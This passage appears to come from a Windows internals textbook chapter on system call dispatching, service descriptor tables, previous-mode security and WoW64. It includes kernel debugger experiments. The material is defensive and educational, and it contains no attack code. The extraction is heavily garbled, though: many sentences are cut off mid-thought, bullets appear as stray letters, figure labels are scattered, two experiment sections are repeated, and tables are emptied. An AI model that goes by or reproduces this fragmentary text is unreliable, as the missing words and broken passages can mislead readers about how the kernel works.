KiSystemCall64Shadow (for
KiSystemCall64Shadow
those that do):
lkd> rdmsr c0000082
msr[c0000082] = fffff804`7ebd3740
lkd> ln fffff804`7ebd3740
(fffff804`7ebd3740) nt!KiSystemCall64
lkd> rdmsr c0000084
msr[c0000084] = 00000000`00004700
x86 system calls occur through sysenter, which uses a different set of MSRs, including 0x176,
sysenter, which uses a different set of MSRs, including 0x176,
sysenter
which stores the 32-bit system call handler:
lkd> rdmsr 176
msr[176] = 00000000'8208c9c0
lkd> ln 00000000'8208c9c0
(8208c9c0) nt!KiFastCallEntry
the int 0x2e handler registered in the IDT with the !idt 2e debugger command:
lkd> !idt 2e
Dumping IDT: fffff8047af03000
2e:
fffff8047ebd3040 nt!KiSystemService
You can disassemble the KiSystemService or KiSystemCall64 routine with the u
nt!KiSystemService+0x227:
fffff804`7ebd3267 4883c408 add rsp,8
fffff804`7ebd326b 0faee8 lfence
fffff804`7ebd326e 65c604255308000000 mov byte ptr gs:[853h],0
fffff804`7ebd3277 e904070000 jmp nt!KiSystemServiceUser (fffff804`7ebd3980)
while the MSR handler will fall in
nt!KiSystemCall64+0x227:
fffff804`7ebd3970 4883c408 add rsp,8
fffff804`7ebd3974 0faee8 lfence
fffff804`7ebd3977 65c604255308000000 mov byte ptr gs:[853h],0
nt!KiSystemServiceUser:
fffff804`7ebd3980 c645ab02 mov byte ptr [rbp-55h],2
This shows you that eventually both code paths arrive in KiSystemServiceUser, which then does
KiSystemServiceUser, which then does
KiSystemServiceUser
most common actions across all processors, as discussed in the next section.
96
CHAPTER 8 System mechanisms
Nonarchitectural system service dispatching
-
tion in the system service dispatch table. On x86 systems, this table is like the interrupt dispatch table
described earlier in the chapter except that each entry contains a pointer to a system service rather
than to an interrupt-handling routine. On other platforms, including 32-bit ARM and ARM64, the table
is implemented slightly differently; instead of containing pointers to the system service, it contains
offsets relative to the table itself. This addressing mechanism is more suited to the x64 and ARM64
application binary interface (ABI) and instruction-encoding format, and the RISC nature of ARM pro-
cessors in general.
Note System service numbers frequently change between OS releases. Not only does
Microsoft occasionally add or remove system services, but the table is also often random-
Regardless of architecture, the system service dispatcher performs a few common actions on
all platforms:
I
I
If this thread belongs to a pico process, forward to the system call pico provider routine
(see Chapter 3, Part 1, for more information on pico providers).
I
If this thread is an UMS scheduled thread, call KiUmsCallEntry to synchronize with the pri-
UmsPerformingSyscall
I
FirstArgument
the system call number in SystemCallNumber.
I
Call the shared user/kernel system call handler (KiSystemServiceStart), which sets the TrapFrame
I
Enable interrupt delivery.
can be interrupted. The next step is to select the correct system call table and potentially upgrade the
thread to a GUI thread, details of which will be based on the GuiThread and RestrictedGuiThread
-
GdiBatchCount
stack. This is needed to avoid having each system call manually copy the arguments (which would
as the kernel is accessing them. This operation is done within a special code block that is recognized
by the exception handlers as being associated to user stack copying, ensuring that the kernel does not
CHAPTER 8 System mechanisms
97
crash in the case that an attacker, or incorrectly written program, is messing with the user stack. Since
system calls can take an arbitrary number of arguments (well, almost), you see in the next section how
the kernel knows how many to copy.
Note that this argument copying is shallow: If any of the arguments passed to a system service
points to a buffer in user space, it must be probed for safe accessibility before kernel-mode code can
read and/or write from it. If the buffer will be accessed multiple times, it may also need to be captured,
or copied, into a local kernel buffer. The responsibility of this probe and capture operation lies with each
individual system call and is not performed by the handler. However, one of the key operations that the
system call dispatcher must perform is to set the previous mode of the thread. This value corresponds
to either KernelMode or UserMode and must be synchronized whenever the current thread executes
a trap, identifying the privilege level of the incoming exception, trap, or system call. This will allow the
system call, using ExGetPreviousMode, to correctly handle user versus kernel callers.
system call tracing is enabled, the appropriate entry/exit callbacks are called around the system call.
Alternatively, if ETW tracing is enabled but not DTrace, the appropriate ETW events are logged around
-
KeSystemCalls variable in the PRCB, which
is exposed as a performance counter that you can track in the Performance & Reliability Monitor.
At this point, system call dispatching is complete, and the opposite steps will then be taken as part
of system call exit. These steps will restore and copy user-mode state as appropriate, handle user-mode
APC delivery as needed, address side-channel mitigations around various architectural buffers, and
eventually return with one of the CPU instructions relevant for this platform.
Kernel-issued system call dispatching
Because system calls can be performed both by user-mode code and kernel mode, any pointers,
handles, and behaviors should be treated as if coming from user mode—which is clearly not correct.
To solve this, the kernel exports specialized Zw versions of these calls—that is, instead of
NtCreateFile, the kernel exports ZwCreateFile. Additionally, because Zw functions must be manually
exported by the kernel, only the ones that Microsoft wishes to expose for third-party use are present.
ZwCreateUserProcess is not exported by name because kernel drivers are not expected to
launch user applications. These exported APIs are not actually simple aliases or wrappers around the Nt
versions. Instead, they are “trampolines” to the appropriate Nt system call, which use the same system
call-dispatching mechanism.
Like KiSystemCall64 does, they too build a fake hardware trap frame (pushing on the stack the
data that the CPU would generate after an interrupt coming from kernel mode), and they also disable
interrupts, just like a trap would. On x64 systems, for example, the KGDT64_R0_CODE (0x0010) selec-
tor is pushed as CS, and the current kernel stack as RSP. Each of the trampolines places the system call
number in the appropriate register (for example, EAX on x86 and x64), and then calls KiServiceInternal,
which saves additional data in the trap frame, reads the current previous mode, stores it in the trap
frame, and then sets the previous mode to KernelMode (this is an important difference).
98
CHAPTER 8 System mechanisms
User-issued system call dispatching
As was already introduced in Chapter 1 of Part 1, the system service dispatch instructions for Windows
executive services exist in the system library Ntdll.dll. Subsystem DLLs call functions in Ntdll to
implement their documented functions. The exception is Windows USER and GDI functions, includ-
WriteFileWriteFile
for more information on API redirection), which in turn calls the WriteFile
NtWriteFile function in Ntdll.dll, which in turn executes the appropriate instruction to cause a system
service trap, passing the system service number representing NtWriteFile.
The system service dispatcher in Ntoskrnl.exe (in this example, KiSystemService) then calls the real
NtWriteFile-
tions, the system service dispatch calls the function in the loadable kernel-mode part of the Windows
either Win32kbase.sys or Win32kfull.sys on Desktop systems, Win32kmin.sys on Windows 10X systems,
or Dxgkrnl.sys if this was a DirectX call.
Call WriteFile(…)
Windows
application
Windows kernel APIs
Call NtWriteFile
Return to caller
WriteFile in
Kernelbase.dll
Call NtWriteFile
Dismiss trap
KiSystemService
in Ntoskrnl.exe
Do the operation
Return to caller
NtWriteFile in
Ntoskrnl.exe
Windows-
specific
Used by all
subsystems
Return to caller
NtWriteFile in
Ntdll.dll
Call BitBlt(…)
Application
Windows USER, GDI
or DirectX APIs
Call NtGdiBitBlt
Return to caller
Gdi32.dll
or User32.dll
Windows-
specific
Windows-
specific
User mode
Kernel mode
Return to caller
NtGdiBitBlt in
Win32u.dll
Software trap
Call NtGdiBitBlt
Routine
Dismiss trap
KiSystemService
in Ntoskrnl.exe
If not filtered call
NtGdiBitBlt
Return to caller
Service entry point
in Win32k.sys
Do the operation
Return to caller
NtGdiBitBlt in
Win32kfull.sys
Software trap
FIGURE 8-26 System service dispatching.
CHAPTER 8 System mechanisms
99
System call security
Since the kernel has the mechanisms that it needs for correctly synchronizing the previous mode for
system call operations, each system call service can rely on this value as part of processing. We previ-
probe
buffer of any sort. By probe, we mean the following:
1.
Making sure that the address is below MmUserProbeAddress
2.
Making sure that the address is aligned to a boundary matching how the caller intends to access
its data—for example, 2 bytes for Unicode characters, 8 bytes for a 64-bit pointer, and so on.
3.
If the buffer is meant to be used for output, making sure that, at the time the system call begins,
it is actually writable.
Note that output buffers could become invalid or read-only at any future point in time, and the
system call must always access them using SEH, which we described earlier in this chapter, to avoid
they will likely be imminently used anyway, SEH must be used to ensure they can be safely read. SEH
must still be taken.
UserMode calls, and all
that a system call must perform, however, because some other dangerous situations can arise:
I
The caller may have supplied a handle to an object. The kernel normally bypasses all security
access checks when referencing objects, and it also has full access to kernel handles (which we
describe later in the “Object Manager” section of this chapter), whereas user-mode code does
not. The previous mode is used to inform the Object Manager that it should still perform access
checks because the request came from user space.
I
OBJ_FORCE_ACCESS_CHECK need
to be used by a driver to indicate that even though it is using the Zw API, which sets the previ-
ous mode to KernelMode, the Object Manager should still treat the request as if coming from
UserMode.
I
IO_FORCE_ACCESS_CHECKING
ZwCreateFile
would change the previous mode to KernelMode and bypass access checks. Potentially, a driver
I
redirection attacks, where privileged kernel-mode code might be incorrectly using various
100
CHAPTER 8 System mechanisms
I
with the Zw interface, must keep in mind that this will reset the previous mode to KernelMode
and respond accordingly.
Service descriptor tables
We previously mentioned that before performing a system call, the user-mode or kernel-mode tram-
the bottom 12 bits, represents the system call index. The second, which uses the next higher 2 bits (12-
13), is the table identifier
types of system services, each stored in a table that can house up to 4096 system calls.
Table Index
Index into table
System service number
0
0
Native API
Unused
KeServiceDescriptorTable
KeServiceDescriptorTableShadow
1
0
Native API
Win32k.sys API
1
13 11
31
FIGURE 8-27 System service number to system service translation.
The kernel keeps track of the system service tables using three possible arrays—KeServiceDescriptor
Table, KeServiceDescriptorTableShadow, and KeServiceDescriptorTableFilter. Each of these arrays can
have up to two entries, which store the following three pieces of data:
I
A pointer to the array of system calls implemented by this service table
I
The number of system calls present in this service table, called the limit
I
A pointer to the array of argument bytes for each of the system calls in this service table
KiServiceTable and KiArgumentTable, with a
little over 450 system calls (the precise number depends on your version of Windows). All threads, by
default, issue system calls that only access this table. On x86, this is enforced by the ServiceTable pointer
in the thread object, while all other platforms hardcode the symbol KeServiceDescriptorTable in the
system call dispatcher.
CHAPTER 8 System mechanisms
101
PsConvertTo
GuiThread
GuiThreadRestrictedGuiThread
one is used depends on whether the EnableFilteredWin32kSystemCalls process mitigation option is
enabled, which we described in the “Process-mitigation policies” section of Chapter 7, Part 1. On x86
ServiceTable pointer now changes to KeServiceDescriptorTableShadow or
KeServiceDescriptorTableFilter
hardcoded symbol chosen at each system call. (Although less performant, the latter avoids an obvious
hooking point for malicious software to abuse.)
As you can probably guess, these other arrays include a second entry, which represents the
Windows USER and GDI services implemented in the kernel-mode part of the Windows subsystem,
albeit these still transit through Win32k.sys initially. This second entry points to W32pServiceTable or
W32pServiceTableFilter and W32pArgumentTable or W32pArgumentTableFilter, respectively, and has
about 1250 system calls or more, depending on your version of Windows.
Note Because the kernel does not link against Win32k.sys, it exports a
KeAddSystemServiceTable function that allows the addition of an additional entry into
the KeServiceDescriptorTableShadow and the KeServiceDescriptorTableFilter table if it has
and PatchGuard protects the arrays once this function has been called, so that the structures
effectively become read only.
The only material difference between the Filter entries is that they point to system calls in Win32k.sys
with names like stub_UserGetThreadState, while the real array points to NtUserGetThreadState. The for-
STATUS_INVALID_SYSTEM_SERVICE
(such as NtUserGetThreadState), with potential telemetry if auditing is enabled.
The argument tables, on the other hand, are what help the kernel to know how many stack bytes need
to be copied from the user stack into the kernel stack, as explained in the dispatching section earlier.
Each entry in the argument table corresponds to the matching system call with that index and stores
the count of bytes to copy (up to 255). However, kernels for platforms other than x86 employ a mecha-
nism called system call table compaction, which combines the system call pointer from the call table
with the byte count from the argument table into a single value. The feature works as follows:
1.
Take the system call function pointer and compute the 32-bit difference from the beginning of
the system call table itself. Because the tables are global variables inside of the same module
that contains the functions, this range of ±2 GB should be more than enough.
102
CHAPTER 8 System mechanisms
2.
Take the stack byte count from the argument table and divide it by 4, converting it into an
argument count
simply be considered as two “arguments”).
3.
bit-
wise or operation to add the argument count from the second step.
4.
Override the system call function pointer with the value obtained in step 3.
-
pointer dereferences, and it acts as a layer of obfuscation, which makes it harder to hook or patch the
system call table while making it easier for PatchGuard to defend it.
EXPERIMENT: Mapping system call numbers to functions and arguments
You can duplicate the same lookup performed by the kernel when dealing with a system call
On an x86 system, you can just ask the debugger to dump each system call table, such as
KiServiceTable with the dps command, which stands for dump pointer symbol, which will actu-
ally perform a lookup for you. You can then similarly dump the KiArgumentTable (or any of the
Win32k.sys ones) with the db command or dump bytes.
A more interesting exercise, however, is dumping this data on an ARM64 or x64 system, due
to the encoding we described earlier. The following steps will help you do that.
1.
NtMapUserPhysicalPagesScatter:
lkd> ?? ((ULONG)(nt!KiServiceTable[3]) >> 4) + (int64)nt!KiServiceTable
unsigned int64 0xfffff803`1213e030
lkd> ln 0xfffff803`1213e030
(fffff803`1213e030) nt!NtMapUserPhysicalPagesScatter
2.
You can see the number of stack-based 4-byte arguments this system call takes by
taking the 4-bit argument count:
lkd> dx (((int*)&(nt!KiServiceTable))[3] & 0xF)
(((int*)&(nt!KiServiceTable))[3] & 0xF) : 0
3.
system, the call could take anywhere between 0 and 4 arguments, all of which are in
registers (RCX, RDX, R8, and R9).
EXPERIMENT: Mapping system call numbers to functions and arguments
You can duplicate the same lookup performed by the kernel when dealing with a system call
On an x86 system, you can just ask the debugger to dump each system call table, such as
KiServiceTable with the dps command, which stands for dump pointer symbol, which will actu
dump pointer symbol, which will actu
dump pointer symbol
-
ally perform a lookup for you. You can then similarly dump the KiArgumentTable (or any of the
Win32k.sys ones) with the db command or dump bytes.
A more interesting exercise, however, is dumping this data on an ARM64 or x64 system, due
to the encoding we described earlier. The following steps will help you do that.
1.
NtMapUserPhysicalPagesScatter:
lkd> ?? ((ULONG)(nt!KiServiceTable[3]) >> 4) + (int64)nt!KiServiceTable
unsigned int64 0xfffff803`1213e030
lkd> ln 0xfffff803`1213e030
(fffff803`1213e030) nt!NtMapUserPhysicalPagesScatter
2.
You can see the number of stack-based 4-byte arguments this system call takes by
taking the 4-bit argument count:
lkd> dx (((int*)&(nt!KiServiceTable))[3] & 0xF)
(((int*)&(nt!KiServiceTable))[3] & 0xF) : 0
3.
system, the call could take anywhere between 0 and 4 arguments, all of which are in
registers (RCX, RDX, R8, and R9).
CHAPTER 8 System mechanisms
103
4.
You could also use the debugger data model to create a LINQ predicate using projection,
dumping the entire table, leveraging the fact that the KiServiceLimit variable corresponds
W32pServiceLimit for the
Win32k.sys entries in the shadow descriptor table). The output would look like this:
lkd> dx @$table = &nt!KiServiceTable
@$table = &nt!KiServiceTable : 0xfffff8047ee24800 [Type: void *]
lkd> dx (((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->
Select(x => (x >> 4) + @$table)
(((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select
(x => (x >> 4) + @$table)
[0]
: 0xfffff8047eb081d0 [Type: void *]
[1]
: 0xfffff8047eb10940 [Type: void *]
[2]
: 0xfffff8047f0b7800 [Type: void *]
[3]
: 0xfffff8047f299f50 [Type: void *]
[4]
: 0xfffff8047f012450 [Type: void *]
[5]
: 0xfffff8047ebc5cc0 [Type: void *]
[6]
: 0xfffff8047f003b20 [Type: void *]
5.
You could use a more complex version of this command that would also allow you to
convert the pointers into their symbolic forms, essentially reimplementing the dps
command that works on x86 Windows:
lkd> dx @$symPrint = (x => Debugger.Utility.Control.ExecuteCommand(".printf \"%y\\n\"," +
((unsigned __int64)x).ToDisplayString("x")).First())
@$symPrint = (x => Debugger.Utility.Control.ExecuteCommand(".printf \"%y\\n\"," +
((unsigned __int64)x).ToDisplayString("x")).First())
lkd> dx (((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select
(x => @$symPrint((x >> 4) + @$table))
(((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select(x =>
@$symPrint((x >> 4) + @$table))
[0]
: nt!NtAccessCheck (fffff804`7eb081d0)
[1]
: nt!NtWorkerFactoryWorkerReady (fffff804`7eb10940)
[2]
: nt!NtAcceptConnectPort (fffff804`7f0b7800)
[3]
: nt!NtMapUserPhysicalPagesScatter (fffff804`7f299f50)
[4]
: nt!NtWaitForSingleObject (fffff804`7f012450)
[5]
: nt!NtCallbackReturn (fffff804`7ebc5cc0)
6.
Win32k.sys entries, you can also use the !chksvctbl -v command in the debugger,
whose output will include all of this data while also checking for inline hooks that a
rootkit may have attached:
lkd> !chksvctbl -v
# ServiceTableEntry DecodedEntryTarget(Address) CompactedOffset
==========================================================================================
0 0xfffff8047ee24800 nt!NtAccessCheck(0xfffff8047eb081d0) 0n-52191996
1 0xfffff8047ee24804 nt!NtWorkerFactoryWorkerReady(0xfffff8047eb10940) 0n-51637248
2 0xfffff8047ee24808 nt!NtAcceptConnectPort(0xfffff8047f0b7800) 0n43188226
3 0xfffff8047ee2480c nt!NtMapUserPhysicalPagesScatter(0xfffff8047f299f50) 0n74806528
4 0xfffff8047ee24810 nt!NtWaitForSingleObject(0xfffff8047f012450) 0n32359680
4.
You could also use the debugger data model to create a LINQ predicate using projection,
dumping the entire table, leveraging the fact that the KiServiceLimit variable corresponds
KiServiceLimit variable corresponds
KiServiceLimit
W32pServiceLimit for the
Win32k.sys entries in the shadow descriptor table). The output would look like this:
lkd> dx @$table = &nt!KiServiceTable
@$table = &nt!KiServiceTable : 0xfffff8047ee24800 [Type: void *]
lkd> dx (((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->
Select(x => (x >> 4) + @$table)
(((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select
(x => (x >> 4) + @$table)
[0]
: 0xfffff8047eb081d0 [Type: void *]
[1]
: 0xfffff8047eb10940 [Type: void *]
[2]
: 0xfffff8047f0b7800 [Type: void *]
[3]
: 0xfffff8047f299f50 [Type: void *]
[4]
: 0xfffff8047f012450 [Type: void *]
[5]
: 0xfffff8047ebc5cc0 [Type: void *]
[6]
: 0xfffff8047f003b20 [Type: void *]
5.
You could use a more complex version of this command that would also allow you to
convert the pointers into their symbolic forms, essentially reimplementing the dps
command that works on x86 Windows:
lkd> dx @$symPrint = (x => Debugger.Utility.Control.ExecuteCommand(".printf \"%y\\n\"," +
((unsigned __int64)x).ToDisplayString("x")).First())
@$symPrint = (x => Debugger.Utility.Control.ExecuteCommand(".printf \"%y\\n\"," +
((unsigned __int64)x).ToDisplayString("x")).First())
lkd> dx (((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select
(x => @$symPrint((x >> 4) + @$table))
(((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select(x =>
@$symPrint((x >> 4) + @$table))
[0]
: nt!NtAccessCheck (fffff804`7eb081d0)
[1]
: nt!NtWorkerFactoryWorkerReady (fffff804`7eb10940)
[2]
: nt!NtAcceptConnectPort (fffff804`7f0b7800)
[3]
: nt!NtMapUserPhysicalPagesScatter (fffff804`7f299f50)
[4]
: nt!NtWaitForSingleObject (fffff804`7f012450)
[5]
: nt!NtCallbackReturn (fffff804`7ebc5cc0)
6.
Win32k.sys entries, you can also use the !chksvctbl -v command in the debugger,
whose output will include all of this data while also checking for inline hooks that a
rootkit may have attached:
lkd> !chksvctbl -v
# ServiceTableEntry DecodedEntryTarget(Address) CompactedOffset
==========================================================================================
0 0xfffff8047ee24800 nt!NtAccessCheck(0xfffff8047eb081d0) 0n-52191996
1 0xfffff8047ee24804 nt!NtWorkerFactoryWorkerReady(0xfffff8047eb10940) 0n-51637248
2 0xfffff8047ee24808 nt!NtAcceptConnectPort(0xfffff8047f0b7800) 0n43188226
3 0xfffff8047ee2480c nt!NtMapUserPhysicalPagesScatter(0xfffff8047f299f50) 0n74806528
4 0xfffff8047ee24810 nt!NtWaitForSingleObject(0xfffff8047f012450) 0n32359680
104
CHAPTER 8 System mechanisms
EXPERIMENT: Viewing system service activity
You can monitor system service activity by watching the System Calls/Sec performance counter in
the System object. Run the Performance Monitor, click Performance Monitor under Monitoring
Tools, and click the Add button to add a counter to the chart. Select the System object, select the
System Calls/Sec counter, and then click the Add button to add the counter to the chart.
to have hundreds of thousands of system calls a second, especially the more processors the system
WoW64 (Windows-on-Windows)
WoW64 (Win32 emulation on 64-bit Windows) refers to the software that permits the execution of
32-bit applications on 64-bit platforms (which can also belong to a different architecture). WoW64 was
originally a research project for running x86 code in old alpha and MIPS version of Windows NT 3.51. It
has drastically evolved since then (that was around the year 1995). When Microsoft released Windows
XP 64-bit edition in 2001, WoW64 was included in the OS for running old x86 32-bit applications in
the new 64-bit OS. In modern Windows releases, WoW64 has been expanded to support also running
ARM32 applications and x86 applications on ARM64 systems.
WoW64 core is implemented as a set of user-mode DLLs, with some support from the kernel for cre-
such as the process environment block (PEB) and thread environment block (TEB). Changing WoW64
contexts through Get/SetThreadContext is also implemented by the kernel. Here are the core user-
mode DLLs responsible for WoW64:
EXPERIMENT: Viewing system service activity
You can monitor system service activity by watching the System Calls/Sec performance counter in
the System object. Run the Performance Monitor, click Performance Monitor under
Performance Monitor under
Performance Monitor
Monitoring
Tools, and click the Add button to add a counter to the chart. Select the System object, select the
System Calls/Sec counter, and then click the Add button to add the counter to the chart.
to have hundreds of thousands of system calls a second, especially the more processors the system
CHAPTER 8 System mechanisms
105
I
Wow64.dll Implements the WoW64 core in user mode. Creates the thin software layer that
acts as a kind of intermediary kernel for 32-bit applications and starts the simulation. Handles
CPU context state changes and base system calls exported by Ntoskrnl.exe. It also implements
I
Wow64win.dll Implements thunking (conversion) for GUI system calls exported by Win32k.
sys. Both Wow64win.dll and Wow64.dll include thunking code, which converts a calling conven-
tion from an architecture to another one.
-
longs to a different architecture. In some cases (like for ARM64) the machine code needs to be emulat-
ed or jitted. In this book, we use the term jitting to refer to the just-in-time compilation technique that
involves compilation of small code blocks (called compilation units) at runtime instead of emulating
and executing one instruction at a time.
Here are the DLLs that are responsible in translating, emulating, or jitting the machine code, allow-
ing it to be run by the target operating system:
I
Wow64cpu.dll Implements the CPU simulator for running x86 32-bit code in AMD64 op-
erating systems. Manages the 32-bit CPU context of each running thread inside WoW64 and
and vice versa.
I
Wowarmhw.dll Implements the CPU simulator for running ARM32 (AArch32) applications on
ARM64 systems. It represents the ARM64 equivalent of the Wow64cpu.dll used in x86 systems.
I
Xtajit.dll Implements the CPU emulator for running x86 32-bit applications on ARM64
systems. Includes a full x86 emulator, a jitter (code compiler), and the communication protocol
between the jitter and the XTA cache server. The jitter can create compilation blocks including
ARM64 code translated from the x86 image. Those blocks are stored in a local cache.
The relationship of the WoW64 user-mode libraries (together with other core WoW64 components)
x86 on AMD64
ARM32 on ARM64
x86 on ARM64
NT Kernel
x86 32-bit
EXEs, DLLs
Ntdll.dll
x86 32-bit
Wow64cpu.dll
ARM Thumb-2
EXEs, DLLs
Ntdll.dll
ARM 32-bit
Ntdll.dll
Native
Wow64win.dll
Xtac.exe
Ntoskrnl.exe
Win32k.sys
WoW64 Core
Wow64.dll
Wowarmhw.dll
Ntdll.dll
CHPE
Xtajit.dll
x86 32-bit EXEs, DLLs
CHPE OS EXEs, DLLs
XtaCache.exe
XtaCache Service
FIGURE 8-28 The WoW64 architecture.
106
CHAPTER 8 System mechanisms
Note Older Windows versions designed to run in Itanium machines included a full x86 emula-
tor integrated in the WoW64 layer called Wowia32x.dll. Itanium processors were not able to
A newer Insider release version of Windows also supports executing 64-bit x86 code on
ARM64 systems. A new jitter has been designed for that reason. However emulating AMD64
code in ARM systems is not performed through WoW64. Describing the architecture of the
AMD64 emulator is outside the scope of this release of this book.
The WoW64 core
As introduced in the previous section, the WoW64 core is platform independent: It creates a software
layer for managing the execution of 32-bit code in 64-bit operating systems. The actual translation is
performed by another component called Simulator (also known as Binary Translator), which is platform
Simulator. While the core of WoW64 is almost entirely implemented in user mode (in the Wow64.dll
library), small parts of it reside in the NT kernel.
WoW64 core in the NT kernel
During system startup (phase 1), the I/O manager invokes the PsLocateSystemDlls routine, which maps
all the system DLLs supported by the system (and stores their base addresses in a global array) in the
System process user address space. This also includes WoW64 versions of Ntdll, as described by Table
8-13. Phase 2 of the process manager (PS) startup resolves some entry points of those DLLs, which are
stored in internal kernel variables. One of the exports, LdrSystemDllInitBlock, is used to transfer WoW64
information and function pointers to new WoW64 processes.
TABLE 8-13 Different Ntdll version list
Path
Internal Name
Description
ntdll.dll
The system Ntdll mapped in every user process (except for minimal
processes). This is the only version marked as required.
ntdll32.dll
32-bit x86 Ntdll mapped in WoW64 processes running in 64-bit x86
host systems.
ntdll32.dll
32-bit ARM Ntdll mapped in WoW64 processes running in 64-bit
ARM host systems.
ntdllwow.dll
32-bit x86 CHPE Ntdll mapped in WoW64 processes running in
64-bit ARM host systems.
When a process is initially created, the kernel determines whether it would run under WoW64 using
an algorithm that analyzes the main process executable PE image and checks whether the correct Ntdll
version is mapped in the system. In case the system has determined that the process is WoW64, when
the kernel initializes its address space, it maps both the native Ntdll and the correct WoW64 version.
CHAPTER 8 System mechanisms
107
As explained in Chapter 3 of Part 1, each nonminimal process has a PEB data structure that is acces-
and stores a pointer to it in a small data structure (EWoW64PROCESS) linked to the main EPROCESS
the LdrSystemDllInitBlock symbol, including pointers of Wow64 Ntdll exports.
When a thread is allocated for the process, the kernel goes through a similar process: along with
by a 32-bit TEB.
32-bit CPU context (X86_NT5_CONTEXT or ARM_CONTEXT data structures, depending on the target
architecture), and a pointer of the per-thread WoW64 CPU shared data, which can be used by the
-
contains an initial single thread.
ID, Start Addr,…
Thread List Entry
••••
TEB
Kernel Stack
TCB
Image base
Flags
Ldr Database
Os Information
••••
Nt Global Flags
Native PEB
PCB
ID, Token, …
Thread List
WoW64Process
••••
PEB
32-bit PEB
Ntdll Type
Guest Context
Per-thr. Data
Flags
TOP
Native NT_TIB
Flags, CSR Info,…
WowTebOffset
•••
TLS Slot Array
User Stack
Native & 32-bit TEB
Native Stack
TOP
BASE
TOP
BASE
32-bit Stack
32-bit NT_TIB
Flags, CSR Info,…
WowTebOffset
•••
TLS Slots Array
User Stack
EWoW64PROCESS
Kernel-mode
User-mode
WoW64INFO
EPROCESS
ETHREAD
WoW64 CPU
Area Info
32-bit Image base
Flags
32-bit Ldr DB
Os Information
••••
Nt Global Flags
CpuFlags
CrossSection
Host/Guest
Machine
32-bit PEB
WoW64 Process
WoW64 Thread
CpuFlags
CrossSection
Host/Guest
Machine
FIGURE 8-29
108
CHAPTER 8 System mechanisms
User-mode WoW64 core
Aside from the differences described in the previous section, the birth of the process and its initial
thread happen in the same way as for non-WoW64 processes, until the main thread starts its execu-
tion by invoking the loader initialization function, LdrpInitialize, in the native version of Ntdll. When the
the process initialization routine, LdrpInitializeProcess, which, along with a lot of different things (see
the “Early process initialization” section of Chapter 3 in Part 1 for further details), determines whether
the process is a WoW64 one, based on the presence of the 32-bit TEB (located after the native TEB and
linked to it). In case the check succeeded, the native Ntdll sets the internal UseWoW64 global variable
to 1, builds the path of the WoW64 core library, wow64.dll, and maps it above the 4 GB virtual address
gets the address of some WoW64 functions that deal with process/thread suspension and APC and
exception dispatching and stores them in some of its internal variables.
When the process initialization routine ends, the Windows loader transfers the execution to the
WoW64 Core via the exported Wow64LdrpInitialize
new thread starts through that entry point (instead of the classical RtlUserThreadStart). The WoW64
core obtains a pointer to the CPU WoW64 area stored by the kernel at the TLS slot 1. In case the thread
-
lowing steps:
1.
Tries to load the WoW64 Thunk Logging DLL (wow64log.dll). The Dll is used for logging
WoW64 calls and is not included in commercial Windows releases, so it is simply skipped.
2.
Looks up the Ntdll32 base address and function pointers thanks to the LdrSystemDllInitBlock
3.
-
tem requests and translates their path before invoking the native system calls.
4.
Initializes the WoW64 service tables, which contains pointers to system services belonging to
the NT kernel and Win32k GUI subsystem (similar to the standard kernel system services), but
also Console and NLS service call (both WoW64 system service calls and redirection are cov-
ered later in this chapter.)
5.
archarch> can be
exported functions are resolved and stored in an internal array called BtFuncs. The array is the
BtCpuProcessInit function, for example, represents
CHAPTER 8 System mechanisms
109
6.
section. A synthesized work item is posted on the section when a WoW64 process calls an
API targeting another 32-bit process (this operation propagates thunk operations across
different processes).
7.
The WoW64 layer informs the simulator (by invoking the exported BtCpuNotifyMapViewOfSection)
that the main module, and the 32-bit version of Ntdll have been mapped in the address space.
8.
Wow64Transition exported variable of the 32-bit version of Ntdll. This allows the system call
dispatcher to work.
When the process initialization routine ends, the thread is ready to start the CPU simulation. It
stack for executing the 32-bit version of the LdrInitializeThunk function. The simulation is started via the
BTCpuSimulate exported function, which will never return to the caller (unless a critical error
in the simulator happens).
File system redirection
To maintain application compatibility and to reduce the effort of porting applications from Win32 to
contains native 64-bit images. WoW64, as it intercepts all the system calls, translates all the path re-
lated APIs and replaces various system paths with the WoW64 equivalent (which depends on the target
TABLE 8-14 WoW64 redirected paths
Path
Architecture
Redirected Location
X86 on AMD64
X86 on ARM64
does not exist in SyChpe32)
ARM32
Native
X86
ARM32
Native
X86
ARM32
110
CHAPTER 8 System mechanisms
X86
ARM32
X86
ARM32
are exempted from being redirected such that access attempts to them made by 32-bit applications
actually access the real one. These directories include the following:
I
I
I
I
I
I
per-thread basis through the Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection
functions. This mechanism works by storing an enabled/disabled value on the TLS index 8, which is
consulted by the internal WoW64 RedirectPath function. However, the mechanism can have issues
because once redirection is disabled, the system no longer uses it during internal loading either, and
the other consistent paths introduced earlier is usually a safer methodology for developers to use.
Note Because certain 32-bit applications might indeed be aware and able to deal with
even from an application running under WoW64.
Registry redirection
component is installed and registered both as a 32-bit binary and a 64-bit binary, the last component
registered will override the registration of the previous component because they both write to the
same location in the registry.
CHAPTER 8 System mechanisms
111
To help solve this problem transparently without introducing any code changes to 32-bit compo-
nents, the registry is split into two portions: Native and WoW64. By default, 32-bit components access
the 32-bit view, and 64-bit components access the 64-bit view. This provides a safe execution environ-
ment for 32-bit and 64-bit components and separates the 32-bit application state from the 64-bit one,
if it exists.
As discussed later in the “System calls” section, the WoW64 system call layer intercepts all the system
calls invoked by a 32-bit process. When WoW64 intercepts the registry system calls that open or create a
registry key, it translates the key path to point to the WoW64 view of the registry (unless the caller explic-
itly asks for the 64-bit view.) WoW64 can keep track of the redirected keys thanks to multiple tree data
where the system should begin the redirection). WoW64 redirects the registry at these points:
I
I
Not the entire hive is split. Subkeys belonging to those root keys can be stored in the private
WoW64 part of the registry (in this case, the subkey is a split key). Otherwise, the subkey can be kept
shared between 32-bit and 64-bit apps (in this case, the subkey is a shared key). Under each of the split
